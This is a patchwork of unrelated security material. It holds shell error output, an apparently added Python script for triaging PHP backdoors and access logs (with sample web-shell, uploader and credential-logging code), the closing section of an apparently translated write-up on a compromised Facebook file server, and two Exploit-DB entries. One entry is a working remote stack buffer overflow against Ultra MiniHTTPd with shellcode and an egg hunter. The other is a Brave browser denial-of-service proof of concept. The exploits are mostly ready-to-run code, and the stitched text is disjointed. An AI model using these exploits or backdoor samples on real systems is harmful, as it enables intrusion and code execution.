sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
ls: /etc/opt/apache/ssl.key/server.key: No such file or directory
mv: cannot stat: No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat: No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat: No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat: No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
mv: cannot stat: No such file or directory
sh: /etc/opt/apache/ssl.crt/server.crt: Permission denied
base64: invalid input
From the browser, the certificate for files.fb.com looks like a wildcard *.fb.com certificate...
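The evidence above comes in two forms: backdoor files dropped into the web root (a one-line command runner, an uploader, and an include that wraps the original ".inc.orig" to log credentials) and the traces those files left in the access log because every parameter went over GET and stderr was never redirected. The following triage script is an added example, not the author's tooling: it flags PHP sources matching those patterns, spots the "x.inc beside x.inc.orig" wrapper trick, and scans access-log lines for requests to the flagged scripts or for shell commands inside query parameters. The file contents and log lines are constructed to resemble the ones quoted on the page; paths and secrets in them are not real.

```python
"""Triage helpers for the two kinds of evidence quoted above: backdoor files in
the web root and their footprints in the access log. Added example, not the
author's tooling; the sample files and log lines are constructed."""
import re
from urllib.parse import unquote_plus

# --- Source-level indicators matching the quoted backdoors ---------------------
SOURCE_INDICATORS = {
    "executes a request parameter": re.compile(
        r"\b(?:shell_exec|system|passthru|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST)\b"),
    "unrestricted upload": re.compile(r"move_uploaded_file\s*\(\s*\$_FILES\b"),
    "wraps the original include": re.compile(
        r"include(?:_once)?\s*\(\s*['\"][^'\"]+\.orig['\"]"),
    "writes request data to a file": re.compile(
        r"fwrite\s*\(.*?http_build_query\s*\(\s*\$_(?:GET|POST|COOKIE)\b", re.S),
}


def scan_php_source(source):
    """Indicator labels that match one file's text."""
    return [label for label, rx in SOURCE_INDICATORS.items() if rx.search(source)]


def wrapped_originals(filenames):
    """'x.inc' sitting beside 'x.inc.orig' is the proxying trick from the write-up."""
    names = set(filenames)
    return sorted(f for f in filenames if f + ".orig" in names)


# --- Access-log indicators -----------------------------------------------------
# Common-log style line; the request target is matched non-greedily because the
# quoted FTA log keeps spaces inside the query string.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" (?P<status>\d{3})')
# Shell metacharacters, redirections and the tools seen in the quoted commands.
SHELL_TOKENS = re.compile(
    r"(?:\b(?:sshpass|ssh|wget|curl|dig|telnet|ldapsearch|tar|base64)\b|2>|[;|`]|\$\()")


def scan_access_log(lines, flagged_scripts=()):
    """Return one finding per suspicious request line."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        reasons = []
        if path.rsplit("/", 1)[-1] in flagged_scripts:
            reasons.append("request to a flagged script")
        for pair in query.split("&"):          # split by hand: '&' only, never ';'
            key, _, value = pair.partition("=")
            if SHELL_TOKENS.search(unquote_plus(value)):
                reasons.append(f"shell command in parameter '{unquote_plus(key)}'")
        if reasons:
            findings.append({"ip": m["ip"], "path": path,
                             "status": int(m["status"]), "reasons": reasons})
    return findings


def triage(files, log_lines):
    """Both views together: which files look like backdoors, and who used them."""
    backdoors = {name: hits for name, hits in
                 ((n, scan_php_source(src)) for n, src in files.items()) if hits}
    return {
        "backdoors": backdoors,
        "wrapped": wrapped_originals(list(files)),
        "log": scan_access_log(log_lines, flagged_scripts=set(backdoors)),
    }


# Constructed samples modelled on the page's evidence (paths and secrets are not real).
SAMPLE_FILES = {
    "bn3dl0aw.php": "<?php echo shell_exec($_GET['c']);",
    "uploader.php": "<?php move_uploaded_file($_FILES['f']['tmp_name'], basename($_FILES['f']['name']));",
    "sclient_user_class_standard.inc": (
        "<?php\ninclude_once('sclient_user_class_standard.inc.orig');\n"
        "$fp = fopen('/tmp/example.log', 'a');\n"
        "fwrite($fp, date('Y-m-d') . ';' . http_build_query($_GET));\n"),
    "sclient_user_class_standard.inc.orig": "<?php // untouched product code\n",
    "index.php": "<?php echo 'hello';\n",
}
SAMPLE_LOG = [
    '10.0.0.5 - - [23/Jan/2016:19:04:10 +0000] "GET /courier/custom_template/1000/bn3dl0aw.php'
    '?c=./sshpass+-p+%27x%27+ssh+user@localhost+%27cp+a+b%27+2%3E/dev/stdout HTTP/1.1" 200 2559',
    '10.0.0.6 - - [23/Jan/2016:19:05:00 +0000] "GET /courier/web/1000/login.html?lang=en HTTP/1.1" 200 512',
    '10.0.0.5 - - [23/Jan/2016:19:06:02 +0000] "POST /courier/custom_template/1000/uploader.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_FILES, SAMPLE_LOG), indent=2))
```

Because the backdoors here took their commands over GET, the access log alone reconstructs most of the activity; a responder should also diff every ".inc" against its ".orig" sibling, since the wrapper is syntactically ordinary PHP that no command-execution signature will catch.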
0x03 Summary and postscript
Once enough evidence had been collected, it was immediately reported to the Facebook security team. Besides the vulnerability details, the report also included the corresponding logs, screenshots and time records XD
From the server logs, there are two obvious periods when the hacker was on the system: one in early July, the other in mid-September.
The early-July actions, judging from the records, look more like "scouting" the server, while the mid-September operations were more malicious: besides "scouting", a password logger and so on were planted. Whether the "hackers" at the two points in time were the same person is unknown :p
The July timing was just before the CVE-2015-2857 exploit was published, so it is impossible to know whether the system was compromised with a 1-day or a 0-day. This incident is recorded here. All in all, this was a very interesting experience XD, and it also gave me the opportunity to write an article about penetration :p
Finally, thanks to the Bug Bounty.
# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
# Date: 2018-04-14
# Exploit Author: jollymongrel
# Vendor Homepage: http://www.vector.co.jp
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.2
# Tested on: Windows 7 32-bit
# CVE : CVE-2013-5019
import sys
import socket
import struct
eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]
#windows/exec - 274 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=thread
#CMD=calc.exe
#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
"\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"
"\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"
"\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"
"\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"
"\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"
"\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"
"\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"
"\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"
"\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"
"\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"
"\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"
"\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"
"\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"
"\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"
"\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"
"\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"
"\x9a\x9d\xe2\xd0")
#egg hunter to search for no0bno0b
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
payload = "A" * 537
payload += shellcode
payload += "A" * (967 - len(payload))
payload += eip
payload += egghunter
payload += "\xff\xe7" #jmp edi
payload += "C" * (1007 - len(payload))
print "[+] sending payload, length", len(payload)
buf = "GET /"+payload+"HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.32.175", 80))
s.send(buf)
data = s.recv(1024)
s.close()
# Exploit Title: Brave Browser < 0.13.0 - Denial of Service (resource consumption) via a long alert() argument
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage: https://brave.com
# Software Link: https://github.com/brave/browser-laptop
# Version: 0.12.5
# Tested on: Kali Linux, Ubuntu, Windows
# CVE : CVE-2017-18256
#PoC
<html>
<script>
alert('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
